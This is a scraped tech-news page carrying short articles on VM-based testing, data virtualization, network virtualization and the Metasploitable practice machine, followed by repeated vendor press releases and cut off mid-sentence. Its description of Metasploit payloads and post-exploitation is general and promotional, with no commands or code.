Data virtualization key to healthcare's next wave

Fewer industries have reaped the benefits of today’s digital world more than healthcare. The digital revolution has streamlined access to data allowing for more accurate and comprehensive patient care across the care continuum.

Spotlight

Silicus

Silicus is a cloud transformation services company, focused on helping enterprises drive cloud-enabled business innovation & modernization, deploy differentiation at scale, and manage technology investments through their lifecycle.

OTHER ARTICLES
Server Virtualization

VM Applications for Software Development and Secure Testing

Article | May 17, 2023

Contents 1. Introduction 2. Software Development and Secure Testing 3. Using VMs in Software Development and Secure Testing 4. Conclusion 1. Introduction “Testing is an infinite process of comparing the invisible to the ambiguous in order to avoid the unthinkable happening to the anonymous.” —James Bach. Testing software is crucial for identifying and fixing security vulnerabilities. However, meeting quality standards for functionality and performance does not guarantee security. Thus, software testing nowadays is a must to identify and address application security vulnerabilities to maintain the following: Security of data history, databases, information, and servers Customers’ integrity and trust Web application protection from future attacks VMs provide a flexible and isolated environment for software development and security testing. They offer easy replication of complex configurations and testing scenarios, allowing efficient issue resolution. VMs also provide secure testing by isolating applications from the host system and enabling a reset to a previous state. In addition, they facilitate DevOps practices and streamline the development workflow. 2. Software Development and Secure Testing Software Secure Testing: The Approach The following approaches must be considered while preparing and planning for security tests: Architecture Study and Analysis: Understand whether the software meets the necessary requirements. Threat Classification: List all potential threats and risk factors that must be tested. Test Planning: Run the tests based on the identified threats, vulnerabilities, and security risks. Testing Tool Identification: For software security testing tools for web applications, the developer must identify the relevant security tools to test the software for specific use cases. Test-Case Execution: After performing a security test, the developer should fix it using any suitable open-source code or manually. Reports: Prepare a detailed test report of the security tests performed, containing a list of the vulnerabilities, threats, and issues resolved and the ones that are still pending. Ensuring the security of an application that handles essential functions is paramount. This may involve safeguarding databases against malicious attacks or implementing fraud detection mechanisms for incoming leads before integrating them into the platform. Maintaining security is crucial throughout the software development life cycle (SDLC) and must be at the forefront of developers' minds while executing the software's requirements. With consistent effort, the SDLC pipeline addresses security issues before deployment, reducing the risk of discovering application vulnerabilities while minimizing the damage they could cause. A secure SDLC makes developers responsible for critical security. Developers need to be aware of potential security concerns at each step of the process. This requires integrating security into the SDLC in ways that were not needed before. As anyone can potentially access source code, coding with potential vulnerabilities in mind is essential. As such, having a robust and secure SDLC process is critical to ensuring applications are not subject to attacks by hackers. 3. Using VMs in Software Development and Secure Testing: Snapshotting: Snapshotting allows developers to capture a VM's state at a specific point in time and restore it later. This feature is helpful for debugging and enables developers to roll back to a previous state when an error occurs. A virtual machine provides several operations for creating and managing snapshots and snapshot chains. These operations let users create snapshots, revert to any snapshots in the chain, and remove snapshots. In addition, extensive snapshot trees can be created to streamline the flow. Virtual Networking: It allows virtual machines to be connected to virtual networks that simulate complex network topologies, allowing developers to test their applications in different network environments. This allows expanding data centers to cover multiple physical locations, gaining access to a plethora of more efficient options. This empowers them to effortlessly modify the network as per changing requirements without any additional hardware. Moreover, providing the network for specific applications and needs offers greater flexibility. Additionally, it enables workloads to be moved seamlessly across the network infrastructure without compromising on service, security, or availability. Resource Allocation: VMs can be configured with specific resource allocations such as CPU, RAM, and storage, allowing developers to test their applications under different resource constraints. Maintaining a 1:1 ratio between the virtual machine processor and its host or core is highly recommended. It's crucial to refrain from over-subscribing virtual machine processors to a single core, as this could lead to stalled or delayed events, causing significant frustration and dissatisfaction among users. However, it is essential to acknowledge that IT administrators sometimes overallocate virtual machine processors. In such cases, a practical approach is to start with a 2:1 ratio and gradually move towards 4:1, 8:1, 12:1, and so on while bringing virtual allocation into IT infrastructure. This approach ensures a safe and seamless transition towards optimized virtual resource allocation. Containerization within VMs: Containerization within VMs provides an additional layer of isolation and security for applications. Enterprises are finding new use cases for VMs to utilize their in-house and cloud infrastructure to support heavy-duty application and networking workloads. This will also have a positive impact on the environment. DevOps teams use containerization with virtualization to improve software development flexibility. Containers allow multiple apps to run in one container with the necessary components, such as code, system tools, and libraries. For complex applications, both virtual machines and containers are used together. However, while containers are used for the front-end and middleware, VMs are used for the back-end. VM Templates: VM templates are pre-configured virtual machines that can be used as a base for creating new virtual machines, making it easier to set up development and testing environments. A VM template is an image of a virtual machine that serves as a master copy. It includes VM disks, virtual devices, and settings. By using a VM template, cloning a virtual machine multiple times can be achieved. When you clone a VM from a template, the clones are independent and not linked to the template. VM templates are handy when a large number of similar VMs need to be deployed. They preserve VM consistency. To edit a template, convert it to a VM, make the necessary changes, and then convert the edited VM back into a new template. Remote Access: VMs can be accessed remotely, allowing developers and testers to collaborate more effectively from anywhere worldwide. To manage a virtual machine, follow these steps: enable remote access, connect to the virtual machine, and then access the VNC or serial console. Once connected, full permission to manage the virtual machine is granted with the user's approval. Remote access provides a secure way to access VMs, as connections can be encrypted and authenticated to prevent unauthorized access. Additionally, remote access allows for easier management of VMs, as administrators can monitor and control virtual machines from a central location. DevOps Integration: DevOps is a collection of practices, principles, and tools that allow a team to release software quickly and efficiently. Virtualization is vital in DevOps when developing intricate cloud, API, and SOA systems. Virtual machines enable teams to simulate environments for creating, testing, and launching code, ultimately preserving computing resources. While commencing a bug search at the API layer, teams find that virtual machines are suitable for test-driven development (TDD). Virtualization providers handle updates, freeing up DevOps teams, to focus on other areas and increasing productivity by 50 –60%. In addition, VMs allow for simultaneous testing of multiple release and patch levels, improving product compatibility and interoperability. 4. Conclusion The outlook for virtual machine applications is highly promising in the development and testing fields. With the increasing complexity of development and testing processes, VMs can significantly simplify and streamline these operations. In the future, VMs are expected to become even more versatile and potent, providing developers and testers with a broader range of tools and capabilities to facilitate the development process. One potential future development is integrating machine learning and artificial intelligence into VMs. This would enable VMs to automate various tasks, optimize the allocation of resources, and generate recommendations based on performance data. Moreover, VMs may become more agile and lightweight, allowing developers and testers to spin up and spin down instances with greater efficiency. The future of VM applications for software development and security testing looks bright, with continued innovation and development expected to provide developers and testers with even more powerful and flexible tools to improve the software development process.

Read More
Server Hypervisors

How to Start Small and Grow Big with Data Virtualization

Article | September 9, 2022

Why Should Companies Care about Data Virtualization? Data is everywhere. With each passing day, companies generate more data than ever before, and what exactly can they do with all this data? Is it just a matter of storing it? Or should they manage and integrate their data from the various sources? How can they store, manage, integrate and utilize their data to gain information that is of critical value to their business? As they say, knowledge is power, but knowledge without action is useless. This is where the Denodo Platform comes in. The Denodo Platform gives companies the flexibility to evolve their data strategies, migrate to the cloud, or logically unify their data warehouses and data lakes, without affecting business. This powerful platform offers a variety of subscription options that can benefit companies immensely. For example, companies often start out with individual projects using a Denodo Professional subscription, but in a short period of time they end up adding more and more data sources and move on to other Denodo subscriptions such as Denodo Enterprise or Denodo Enterprise Plus. The upgrade process is very easy to establish; in fact, it can be done in less than a day once the cloud marketplace is chosen (Amazon Web Services (AWS), Microsoft Azure, or Google Cloud Platform (GCP). In as little as six weeks companies can realize real business benefits from managing and utilizing their data effectively. A Bridging Layer Data virtualization has been around for quite some time now. Denodo’s founders, Angel Viña and Alberto Pan, have been involved in data virtualization from as far back as the 1990’s. If you’re not familiar with data virtualization, here is a quick summary. Data virtualization is the cornerstone to a logical data architecture, whether it be a logical data warehouse, logical data fabric, data mesh, or even a data hub. All of these architectures are best served by our principals Combine (bring together all your data sources), Connect (into a logical single view) and Consume (through standard connectors to your favorite BI/data science tools or through our easy-to-use robust API’s). Data virtualization is the bridge that joins multiple data sources to fuel analytics. It is also the logical data layer that effectively integrates data silos across disparate systems, manages unified data for centralized security, and delivers it to business users in real time. Economic Benefits in Less Than 6 weeks with Data Virtualization? In a short duration, how can companies benefit from choosing data virtualization as a data management solution? To answer this question, below are some very interesting KPI’s discussed in the recently released Forrester study on the Total Economic Impact of Data Virtualization. For example, companies that have implemented data virtualization have seen an 83% increase in business user productivity. Mainly this is due to the business-centric way a data virtualization platform is delivered. When you implement data virtualization, you provide business users with an easy to access democratized interface to their data needs. The second KPI to note is a 67% reduction in development resources. With data virtualization, you connect to the data, you do not copy it. This means once it is set up, there is a significant reduction in the need for data integration engineers, as data remains in the source location and is not copied around the enterprise. Finally, companies are reporting a 65% improvement in data access speeds above and beyond more traditional approaches such as extract, transform, and load (ETL) processes. A Modern Solution for an Age-Old Problem To understand how data virtualization can help elevate projects to an enterprise level, we can share a few use cases in which companies have leveraged data virtualization to solve their business problems across several different industries. For example, in finance and banking we often see use cases in which data virtualization can be used as a unifying platform to help improve compliance and reporting. In retail, we see use cases including predictive analytics in supply chains as well as next and best actions from a unified view of the customer. There are many uses for data virtualization in a wider variety of situations, such as in healthcare and government agencies. Companies use the Denodo Platform to help data scientists understand key trends and activities, both sociologically as well as economically. In a nutshell, if data exists in more than one source, then the Denodo Platform acts as the unifying platform that connects, combines and allows users to consume the data in a timely, cost-effective manner.

Read More
Virtual Desktop Strategies

Network Virtualization: Gaining a Competitive Edge

Article | July 26, 2022

Network virtualization (NV) is the act of combining a network's physical hardware into a single virtual network. This is often accomplished by running several virtual guest computers in software containers on a single physical host system. Network virtualization is the gold standard for networking, and it is being adopted by enterprises of all kinds globally. By integrating their existing network gear into a single virtual network, enterprises can save operating expenses, automate network and security processes, and set the stage for future growth. Businesses can use virtualization to imitate many types of traditional hardware, including servers, storage devices, and network resources. Three Forces Driving Network Virtualization Demand for enterprise networks keeps rising, driven by higher end-user demands and the proliferation of devices and business software. Through network virtualization, IT businesses are gaining the ability to respond to evolving needs and match their networking capabilities with their virtualized storage and computing resources. According to a recent SDxCentral survey, 88% of respondents believe that adopting a network virtualization solution is "mission critical" and that it is necessary to assist IT in addressing the immediate requirements of flexibility, scalability, and cost savings (both OpEx and CapEx) in the data center. Speed Today, consider any business as an example. Everything depends on IT's capacity to assist business operations. When a company wants to 'surprise' its clients with a new app, launch a competitive offer, or pursue a fresh route to market, it requires immediate IT assistance. That implies IT must move considerably more swiftly, and networks must evolve at the rapid speed of a digitally enabled organization. Security According to a PricewaterhouseCoopers survey, the average organization experiences two successful cyberattacks every week. Perimeter security is just insufficient to stem the flood, and network experts are called upon to provide a better solution. The new data center security approach will: Be software-based Use the micro-segmentation principle Adopt a Zero Trust (ZT) paradigm In an ideal world, there would be no difference between trustworthy and untrusted networks or sectors, but a ZT model necessitates a network virtualization technology that allows micro-segmentation. Flexibility Thanks to the emergence of server virtualization, applications are no longer linked to a specific physical server in a single location. Applications can now be replicated to eliminate a data center for disaster recovery, moved through one corporate data center to another, or slipped into a hybrid cloud environment. The problem is that network setup is hardware-dependent, and hardwired networking connections restrict them. Because networking services vary significantly from one data center to the next, as an in-house data center differs from a cloud, you must perform extensive personalization to make your applications work in different network environments—a significant barrier to app mobility and another compelling reason to utilize network virtualization. Closing Lines Network virtualization is indeed the future technology. These network virtualization platform characteristics benefit more companies as CIOs get more involved in organizational processes. As consumer demand for real-time solutions develops, businesses will be forced to explore network virtualization as the best way to take their networks to another level.

Read More
Virtual Desktop Tools, Server Hypervisors

Metasploitable: A Platform for Ethical Hacking and Penetration Testing

Article | June 8, 2023

Contents 1. Overview 2. Ethical Hacking and Penetration Testing 3. Metasploit Penetration Test 4. Why Choose Metasploit Framework for your Business? 5. Closing remarks 1. Overview Metasploitable refers to an intentionally vulnerable virtual machine that enables the learning and practice of Metasploit. Metasploit is one of the best penetration testing frameworks that helps businesses discover and shore up their systems' vulnerabilities before hackers exploit them. Security engineers use Metasploit as a penetration testing system and a development platform that allows the creation of security tools and exploits. Metasploit's various user interfaces, libraries, tools, and modules allow users to configure an exploit module, pair it with a payload, point it at a target, and launch it at the target system. In addition, Metasploit's extensive database houses hundreds of exploits and several payload options. 2. Ethical Hacking and Penetration Testing An ethical hacker is one who works within a security framework and checks for bugs that a malicious hacker might use to exploit networks. They use their experience and skills to render the cyber environment. To protect the infrastructure from the threat that hackers pose, ethical hacking is essential. The main purpose of an ethical hacking service is to report and assess the safety of the targeted systems and networks for the owner. Ethical hacking is performed with penetration test techniques to evaluate security loopholes. There are many techniques used to hack information, such as – Information gathering Vulnerability scanning Exploitation Test analysis Ethical hacking involves automatic methods. The hacking process without automated software is inefficient and time-consuming. There are several tools and methods that can be used for ethical hacking and penetration testing. The Metasploit framework eases the effort to exploit vulnerabilities in networks, operating systems, and applications and generates new exploits for new or unknown vulnerabilities. 3. Metasploit Penetration Test Reconnaissance: Integrate Metasploit with various reconnaissance tools to find the vulnerable spot in the system. Threat Modeling and Vulnerability Identification: Once a weakness is identified, choose an exploit and payload for penetration. Exploitation: The payload gets executed at the target if the exploit, a tool used to take advantage of system weakness, is successful, and the user gets a shell for interacting with the payload (a shellcode is a small piece of code used as the payload).The most popular payload, a set of malicious codes to attack Windows systems, is Meterpreter, an in-memory-only interactive shell. (Meterpreter is a Metasploit attack payload that provides an interactive shell for the attacker to explore the target machine and execute code.)Other payloads are: Static payloads (it enables port forwarding and communications between networks) Dynamic payloads (to evade antivirus software, it allows testers to generate unique payloads) Command shell payloads (enables users to run scripts or commands against a host) Post-Exploitation: Metasploit offers various exploitation tools for privilege escalation, packet sniffing, keyloggers, screen capture, and pivoting tools once on the target machine. Resolution and Re-Testing: Users set up a persistent backdoor if the target machine gets rebooted. These available features in Metasploit make it easy to configure as per the user's requirements. 4. Why Choose Metasploit Framework for your Business? Significant advantages of the Metasploit Framework are discussed below: Open-source: Metasploit Framework is actively developed as open-source software, so most companies prefer this to grow their businesses. Easy usage: It is very easy to use, defining an easy-naming conversation with the commands. This also facilitates the building of an extensive penetration test of the network. GUI Environment: It mainly provides third-party instances that are friendly. These interfaces ease the penetration testing projects by providing the facilities with services such as button clicks, over-the-fly vulnerability management, and easy-to-shift workspaces, among others. Cleaner Exits: Metasploit can cleanly exit without detection, even if the target system does not restart after a penetration test. Additionally, it offers various options for maintaining persistent access to the target system. Easy Switching Between Payloads: Metasploit allows testers to change payloads with the 'setpayload' command easily. It offers flexibility for system penetration through shell-based access or meterpreter. 5. Closing remarks From DevSecOps experts to hackers, everyone uses the Ruby-based open-source framework Metasploit, which allows testing via command-line alterations or GUI. Metasploitable is a vulnerable virtual machine ideally used for ethical hacking and penetration testing, in VM security. One trend likely to impact the future of Metasploitable is the increasing use of cloud-based environments for testing and production. It is possible that Metasploitable could be adapted to work in cloud environments or that new tools will be developed specifically for cloud-based penetration testing. Another trend that may impact the future of Metasploitable is the growing importance of automation in security testing. Thus, Metasploitable could be adapted to include more automation features. The future of Metasploitable looks bright as it continues to be a valuable tool for security professionals and enthusiasts. As the security landscape continues to evolve, it will be interesting to see how Metasploitable adapts to meet the community's changing needs.

Read More

Spotlight

Silicus

Silicus is a cloud transformation services company, focused on helping enterprises drive cloud-enabled business innovation & modernization, deploy differentiation at scale, and manage technology investments through their lifecycle.

Related News

Virtual Desktop Tools, Virtual Desktop Strategies, Server Virtualization

Netskope Delivers the Next Evolution in Digital Experience Management for SASE with Proactive DEM

PR Newswire | September 01, 2023

Netskope, a leader in Secure Access Service Edge (SASE), today announced the launch of Proactive Digital Experience Management (DEM) for SASE, elevating best practice from the current reactive monitoring tools to proactive user experience management. Proactive DEM provides experience management capabilities across the entire SASE architecture, including Netskope Intelligent SSE, Netskope Borderless SD-WAN and Netskope NewEdge global infrastructure. Digital Experience Management technology has become increasingly crucial amid digital business transformation, with organizations seeking to enhance customer experiences and improve employee engagement. With hybrid work and cloud infrastructure now the norm globally, organizations have struggled to ensure consistent and optimized experiences alongside stringent security requirements. Gartner predicts that "by 2026, at least 60% of I&O leaders will use DEM to measure application, services and endpoint performance from the user's viewpoint, up from less than 20% in 2021." However, monitoring applications, services, and networks is only part of a modern DEM experience, and so Netskope Proactive DEM goes beyond observation, providing Machine Learning (ML)-driven functionality to anticipate, and automatically remediate, problems. Sanjay Beri, CEO and co-founder of Netskope commented, "Ensuring a constantly optimized experience is essential for organizations looking to support the best productivity returns for hybrid workers and modern cloud infrastructure, but monitoring alone is not enough. Customers have told us of the challenges they face managing a multi-vendor cloud ecosystem and so we have yet again innovated beyond industry standards, providing experience management that can both monitor and proactively remediate." For issue identification, Netskope Proactive DEM uniquely combines Synthetic Monitoring with Real User monitoring, creating SMART monitoring (Synthetic Monitoring Augmentation for Real Traffic). This enables full end-to-end 'hop-by-hop' visibility of data, and the proactive identification of experience-impacting events. SMART monitoring enables organizations to anticipate potential events that might impact upon network and application experience. While most SASE vendors rely on "gray cloud" infrastructure - built on public cloud - which limits their ability to granularly identify and control any issues, Proactive DEM leverages Netskope NewEdge - the industry's largest private cloud infrastructure - to deliver 360 visibility and control of end-to-end user experience while providing mitigation of issues, including using various self-healing mechanisms, before the user recognizes their experience has degraded. About Netskope Netskope, a global SASE leader, helps organizations apply zero trust principles and AI/ML innovations to protect data and defend against cyber threats. Fast and easy to use, the Netskope platform provides optimized access and real-time security for people, devices, and data anywhere they go. Netskope helps customers reduce risk, accelerate performance, and get unrivaled visibility into any cloud, web, and private application activity. Thousands of customers trust Netskope and its powerful NewEdge network to address evolving threats, new risks, technology shifts, organizational and network changes, and new regulatory requirements.

Read More

Virtual Desktop Tools, Server Hypervisors

Meter Partners with Cloudflare to Launch DNS Security

Business Wire | August 31, 2023

Meter, Inc., a leader in Network as a Service (NaaS) for businesses, today announced DNS Security, built in partnership with Cloudflare, the security, performance, and reliability company. Meter DNS Security is now widely available for all Meter Network customers, expanding Meter’s existing NaaS offering and saving teams both time and money, while also improving overall network performance and security, powered by Cloudflare’s Zero Trust platform. “With the number of devices on a network expected to triple by 2030, modern businesses and organizations demand enterprise network controls to ensure safety and peak performance for business critical functions,” said Anil Varanasi, CEO and co-founder of Meter. “Meter DNS Security is the latest example of how we’re continuing to offer our customers enterprise level networks end-to-end. Through our partnership with Cloudflare, we’re enhancing our capabilities to meet the needs of IT professionals at industrial warehouses, educational institutions, security firms, and more.” Meter DNS Security eliminates the hassle of having multiple vendors, by providing content filtering at several layers to all customers within the Meter Dashboard in partnership with one of the best providers in the world. “We’re proud to have Meter leveraging Cloudflare’s Zero Trust platform in a new way, offering our DNS filtering feature natively built into their Meter Dashboard,” said John Graham-Cumming, CTO, Cloudflare. “By building on Cloudflare's platform, Meter enables customers to manage their team’s operations at scale, as well as effectively enforce global corporate policies across diverse corporate spaces, such as offices, schools, and warehouses.” In addition to the ease and scalability of Meter DNS Security, users are ensuring security through enhanced compliance by blocking access to known malicious websites and bad actors. The integration and partnership with Cloudflare provides customers with faster DNS response times, while optimizing network performance by limiting access to high-bandwidth websites and services. Real world examples of this process include, but are not limited to: Ensuring a safe browsing environment at schools by filtering out age inappropriate content Optimizing network performance for warehouses by filtering high bandwidth activities like video streaming Maintaining high security and compliance standards by filtering malicious or illegal content “Tishman Speyer has successfully partnered with Meter to streamline the networking and Wi-Fi experience for our customers,” said Simon Okunev, Managing Director and Chief Information Officer, Tishman Speyer. “The addition of Meter’s DNS Security feature, powered by Cloudflare, will further benefit our customers by providing an additional layer of security.” About Cloudflare Cloudflare, Inc. is on a mission to help build a better Internet. Cloudflare’s suite of products protect and accelerate any Internet application online without adding hardware, installing software, or changing a line of code. Internet properties powered by Cloudflare have all web traffic routed through its intelligent global network, which gets smarter with every request. As a result, they see significant improvement in performance and a decrease in spam and other attacks. Cloudflare was awarded by Reuters Events for Global Responsible Business in 2020, named to Fast Company's Most Innovative Companies in 2021, and ranked among Newsweek's Top 100 Most Loved Workplaces in 2022.

Read More

Server Hypervisors, Vsphere

Napatech Leverages Latest Intel Agilex® FPGA to Launch Industry's first 400Gbps SmartNIC Solutions

prnewswire | August 29, 2023

Napatech™ (OSLO: NAPA.OL), a leading provider of programmable Smart Network Interface Cards (SmartNICs) and Infrastructure Processing Units (IPU) used in cloud, enterprise and telecom datacenter networks, today announced the availability of the Napatech's first 400Gbps programmable SmartNIC solutions, leveraging the latest Intel Agilex® 7 FPGAs to deliver best-in-class performance for applications in security, cloud services, network monitoring and recording. Enterprises and OEMs providing high-performance solutions for network monitoring and recording require NICs with a performance level that matches the high PCI Express (PCIe) bandwidth available in the latest servers such as those based on 4th Gen Intel Xeon® Scalable Processors. The new Napatech NT400 SmartNIC platform, based on the Intel® FPGA SmartNIC N6000-PL Platform, addresses this need through a PCIe Gen 4 16-lane host interface which enables full-duplex 2x100Gbps traffic between network ports and host applications. Similarly, for applications like the 5G packet core in telecom infrastructure that require high-bandwidth inline processing of network data, the NT400 platform sustains a total 400G of traffic over tens of millions of flows. The NT400 programmable SmartNIC platform includes two QSFP56 network ports, supporting up to 2x200G traffic with the flexibility to configure 10G, 25G, 40G, 50G, 100G and 200G network links. The SmartNIC hardware is complemented by Napatech's portfolio of production-grade software packages, including Link-Capture™ for use cases such as network monitoring and recording, Link-Virtualization™ that provides a virtualized data plane for cloud services and Link-Inline™ for inline applications such as 5G User Plane Function (UPF). These integrated solutions deliver a true "IT experience" whereby the user just installs the card and the software, immediately achieving seamless acceleration of their application with no requirement to directly program the SmartNIC itself. At the core of the NT400 platform is the Intel Agilex 7 FPGA F-Tile chiplet, which incorporates a configurable, hardened Ethernet protocol stack for supporting rates from 10G to 400G. Napatech chose the Intel Agilex 7 FPGA for a host of reasons, including scalability options that allow support for five different configurations that meet various price, performance, power and feature goals, tailored to specific customer applications and use cases. The F-Tile features are critical in enabling the NT400 to operate within the space and power limitations of standard servers deployed in network appliances, data centers and edge locations. "As the networking landscape continues to evolve, SmartNICs emerge as the predominant growth catalyst in the expansive NIC market, poised to reach $3.3 billion annually by 2025" said Manoj Sukumaran, Principal Analyst for Datacenter Compute and Networking at Omdia. "High bandwidth programmable Ethernet adapters require very fine optimization in hardware and software to ensure deterministic and predictable processing time and making them suitable for real-time networking applications. Napatech is among the very few vendors who could provide highly optimized SmartNICs and software solutions leveraging FPGAs from vendors like Intel, and deliver highly efficient network offload capabilities" he added. "The NT400 platform represents the latest generation within our portfolio of SmartNIC solutions," said Jarrod Siket, Chief Marketing Officer at Napatech. "We will deliver multiple SKUs based on this platform, providing products with memory configurations as well features like time synchronization and management ports that are precisely tuned to the requirements of our customers' applications, all packaged with the applicable production-grade software." "We are delighted to see Napatech choose the Intel Agilex 7 FPGA for their leading-edge SmartNIC solutions," said Mike Fitton, Vice President Programmable Solutions Group and General Manager, Network Business Division at Intel. "The combination of our FPGAs, which deliver high performance, and power efficiency plus a rich feature set for the most demanding applications, together with Napatech's production-grade hardware and software, helps ensure that customers can deliver leading solutions for a wide range of enterprise and telecom applications." About Napatech Napatech is the leading supplier of SmartNIC solutions used in cloud, enterprise, and telecom datacenters. Through commercial-grade software suites integrated with high-performance hardware, Napatech accelerates network infrastructure and security workloads to deliver best-in-class system-level performance while maximizing the availability of server compute resources for applications and services.

Read More

Virtual Desktop Tools, Virtual Desktop Strategies, Server Virtualization

Netskope Delivers the Next Evolution in Digital Experience Management for SASE with Proactive DEM

PR Newswire | September 01, 2023

Netskope, a leader in Secure Access Service Edge (SASE), today announced the launch of Proactive Digital Experience Management (DEM) for SASE, elevating best practice from the current reactive monitoring tools to proactive user experience management. Proactive DEM provides experience management capabilities across the entire SASE architecture, including Netskope Intelligent SSE, Netskope Borderless SD-WAN and Netskope NewEdge global infrastructure. Digital Experience Management technology has become increasingly crucial amid digital business transformation, with organizations seeking to enhance customer experiences and improve employee engagement. With hybrid work and cloud infrastructure now the norm globally, organizations have struggled to ensure consistent and optimized experiences alongside stringent security requirements. Gartner predicts that "by 2026, at least 60% of I&O leaders will use DEM to measure application, services and endpoint performance from the user's viewpoint, up from less than 20% in 2021." However, monitoring applications, services, and networks is only part of a modern DEM experience, and so Netskope Proactive DEM goes beyond observation, providing Machine Learning (ML)-driven functionality to anticipate, and automatically remediate, problems. Sanjay Beri, CEO and co-founder of Netskope commented, "Ensuring a constantly optimized experience is essential for organizations looking to support the best productivity returns for hybrid workers and modern cloud infrastructure, but monitoring alone is not enough. Customers have told us of the challenges they face managing a multi-vendor cloud ecosystem and so we have yet again innovated beyond industry standards, providing experience management that can both monitor and proactively remediate." For issue identification, Netskope Proactive DEM uniquely combines Synthetic Monitoring with Real User monitoring, creating SMART monitoring (Synthetic Monitoring Augmentation for Real Traffic). This enables full end-to-end 'hop-by-hop' visibility of data, and the proactive identification of experience-impacting events. SMART monitoring enables organizations to anticipate potential events that might impact upon network and application experience. While most SASE vendors rely on "gray cloud" infrastructure - built on public cloud - which limits their ability to granularly identify and control any issues, Proactive DEM leverages Netskope NewEdge - the industry's largest private cloud infrastructure - to deliver 360 visibility and control of end-to-end user experience while providing mitigation of issues, including using various self-healing mechanisms, before the user recognizes their experience has degraded. About Netskope Netskope, a global SASE leader, helps organizations apply zero trust principles and AI/ML innovations to protect data and defend against cyber threats. Fast and easy to use, the Netskope platform provides optimized access and real-time security for people, devices, and data anywhere they go. Netskope helps customers reduce risk, accelerate performance, and get unrivaled visibility into any cloud, web, and private application activity. Thousands of customers trust Netskope and its powerful NewEdge network to address evolving threats, new risks, technology shifts, organizational and network changes, and new regulatory requirements.

Read More

Virtual Desktop Tools, Server Hypervisors

Meter Partners with Cloudflare to Launch DNS Security

Business Wire | August 31, 2023

Meter, Inc., a leader in Network as a Service (NaaS) for businesses, today announced DNS Security, built in partnership with Cloudflare, the security, performance, and reliability company. Meter DNS Security is now widely available for all Meter Network customers, expanding Meter’s existing NaaS offering and saving teams both time and money, while also improving overall network performance and security, powered by Cloudflare’s Zero Trust platform. “With the number of devices on a network expected to triple by 2030, modern businesses and organizations demand enterprise network controls to ensure safety and peak performance for business critical functions,” said Anil Varanasi, CEO and co-founder of Meter. “Meter DNS Security is the latest example of how we’re continuing to offer our customers enterprise level networks end-to-end. Through our partnership with Cloudflare, we’re enhancing our capabilities to meet the needs of IT professionals at industrial warehouses, educational institutions, security firms, and more.” Meter DNS Security eliminates the hassle of having multiple vendors, by providing content filtering at several layers to all customers within the Meter Dashboard in partnership with one of the best providers in the world. “We’re proud to have Meter leveraging Cloudflare’s Zero Trust platform in a new way, offering our DNS filtering feature natively built into their Meter Dashboard,” said John Graham-Cumming, CTO, Cloudflare. “By building on Cloudflare's platform, Meter enables customers to manage their team’s operations at scale, as well as effectively enforce global corporate policies across diverse corporate spaces, such as offices, schools, and warehouses.” In addition to the ease and scalability of Meter DNS Security, users are ensuring security through enhanced compliance by blocking access to known malicious websites and bad actors. The integration and partnership with Cloudflare provides customers with faster DNS response times, while optimizing network performance by limiting access to high-bandwidth websites and services. Real world examples of this process include, but are not limited to: Ensuring a safe browsing environment at schools by filtering out age inappropriate content Optimizing network performance for warehouses by filtering high bandwidth activities like video streaming Maintaining high security and compliance standards by filtering malicious or illegal content “Tishman Speyer has successfully partnered with Meter to streamline the networking and Wi-Fi experience for our customers,” said Simon Okunev, Managing Director and Chief Information Officer, Tishman Speyer. “The addition of Meter’s DNS Security feature, powered by Cloudflare, will further benefit our customers by providing an additional layer of security.” About Cloudflare Cloudflare, Inc. is on a mission to help build a better Internet. Cloudflare’s suite of products protect and accelerate any Internet application online without adding hardware, installing software, or changing a line of code. Internet properties powered by Cloudflare have all web traffic routed through its intelligent global network, which gets smarter with every request. As a result, they see significant improvement in performance and a decrease in spam and other attacks. Cloudflare was awarded by Reuters Events for Global Responsible Business in 2020, named to Fast Company's Most Innovative Companies in 2021, and ranked among Newsweek's Top 100 Most Loved Workplaces in 2022.

Read More

Server Hypervisors, Vsphere

Napatech Leverages Latest Intel Agilex® FPGA to Launch Industry's first 400Gbps SmartNIC Solutions

prnewswire | August 29, 2023

Napatech™ (OSLO: NAPA.OL), a leading provider of programmable Smart Network Interface Cards (SmartNICs) and Infrastructure Processing Units (IPU) used in cloud, enterprise and telecom datacenter networks, today announced the availability of the Napatech's first 400Gbps programmable SmartNIC solutions, leveraging the latest Intel Agilex® 7 FPGAs to deliver best-in-class performance for applications in security, cloud services, network monitoring and recording. Enterprises and OEMs providing high-performance solutions for network monitoring and recording require NICs with a performance level that matches the high PCI Express (PCIe) bandwidth available in the latest servers such as those based on 4th Gen Intel Xeon® Scalable Processors. The new Napatech NT400 SmartNIC platform, based on the Intel® FPGA SmartNIC N6000-PL Platform, addresses this need through a PCIe Gen 4 16-lane host interface which enables full-duplex 2x100Gbps traffic between network ports and host applications. Similarly, for applications like the 5G packet core in telecom infrastructure that require high-bandwidth inline processing of network data, the NT400 platform sustains a total 400G of traffic over tens of millions of flows. The NT400 programmable SmartNIC platform includes two QSFP56 network ports, supporting up to 2x200G traffic with the flexibility to configure 10G, 25G, 40G, 50G, 100G and 200G network links. The SmartNIC hardware is complemented by Napatech's portfolio of production-grade software packages, including Link-Capture™ for use cases such as network monitoring and recording, Link-Virtualization™ that provides a virtualized data plane for cloud services and Link-Inline™ for inline applications such as 5G User Plane Function (UPF). These integrated solutions deliver a true "IT experience" whereby the user just installs the card and the software, immediately achieving seamless acceleration of their application with no requirement to directly program the SmartNIC itself. At the core of the NT400 platform is the Intel Agilex 7 FPGA F-Tile chiplet, which incorporates a configurable, hardened Ethernet protocol stack for supporting rates from 10G to 400G. Napatech chose the Intel Agilex 7 FPGA for a host of reasons, including scalability options that allow support for five different configurations that meet various price, performance, power and feature goals, tailored to specific customer applications and use cases. The F-Tile features are critical in enabling the NT400 to operate within the space and power limitations of standard servers deployed in network appliances, data centers and edge locations. "As the networking landscape continues to evolve, SmartNICs emerge as the predominant growth catalyst in the expansive NIC market, poised to reach $3.3 billion annually by 2025" said Manoj Sukumaran, Principal Analyst for Datacenter Compute and Networking at Omdia. "High bandwidth programmable Ethernet adapters require very fine optimization in hardware and software to ensure deterministic and predictable processing time and making them suitable for real-time networking applications. Napatech is among the very few vendors who could provide highly optimized SmartNICs and software solutions leveraging FPGAs from vendors like Intel, and deliver highly efficient network offload capabilities" he added. "The NT400 platform represents the latest generation within our portfolio of SmartNIC solutions," said Jarrod Siket, Chief Marketing Officer at Napatech. "We will deliver multiple SKUs based on this platform, providing products with memory configurations as well features like time synchronization and management ports that are precisely tuned to the requirements of our customers' applications, all packaged with the applicable production-grade software." "We are delighted to see Napatech choose the Intel Agilex 7 FPGA for their leading-edge SmartNIC solutions," said Mike Fitton, Vice President Programmable Solutions Group 